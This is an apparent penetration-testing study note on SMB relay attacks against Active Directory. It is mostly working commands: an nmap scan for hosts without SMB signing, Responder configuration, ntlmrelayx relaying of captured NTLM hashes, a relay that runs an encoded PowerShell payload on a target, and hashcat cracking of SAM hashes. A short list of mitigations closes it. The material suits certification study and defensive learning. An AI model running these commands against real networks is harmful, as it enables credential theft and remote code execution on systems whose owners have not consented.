// notes/ Active Directory
🏛️

Initial Attack Strategy SMB Relay

Instead of cracking the captured hashes, we can instead relay those hashes to specific machines and potentially gain access.

#active directory#adot8
source · oscp.adot8.com · active-directory/initial-attack-strategy_smb-relay

SMB Relay

Overview

Instead of cracking the captured hashes, we can instead relay those hashes to specific machines and potentially gain access.

However, SMB signing MUST BE DISABLED or NOT ENFORCED on target and the relayed credentials must be local administrator on the machine for any real value

Identify Hosts Without SMB Signing

bash
$nmap --script=smb2-security-mode.nse -p445 192.168.1.0/24

Desired Output

bash
$PORT STATE SERVICE
$445/tcp open microsoft-ds
$
$Host script results:
$| smb2-security-mode:
$| 3:1:1:
$|_ Message signing enabled but not required

Edit Responder Configuration File

bash
$sudo vim /etc/responder/Responder.conf
$
$SMB = off
$HTTP = off

Responder + SMB Relay

bash
$sudo responder -I etho0 -dwv
$
$impacket-ntlmrelayx -tf targets.txt -smb2support

Existing Shell + SMB Relay

code
01ntlmrelayx.py --no-http-server -smb2support -t 192.168.186.212 -c "powershell -e JABPE..."
02
03net use "\\192.168.45.237\share"

Crack SAM Hashes

bash
$hashcat -m 1000 crackme.txt ~/rockyou.txt -O

Mitigation

  • Enable SMB Signing on all devices
    • Pro: Completely stops the attacks
    • Con: Performance issues may arise with file copies
  • Disable NTLM authentication on the Network
    • Pros: Completely stops the attack
    • Con: If Kerberos stops working, Windows defaults back to NTLM
  • Limit Domain Admins for specific tasks
  • Local Administrator restrictions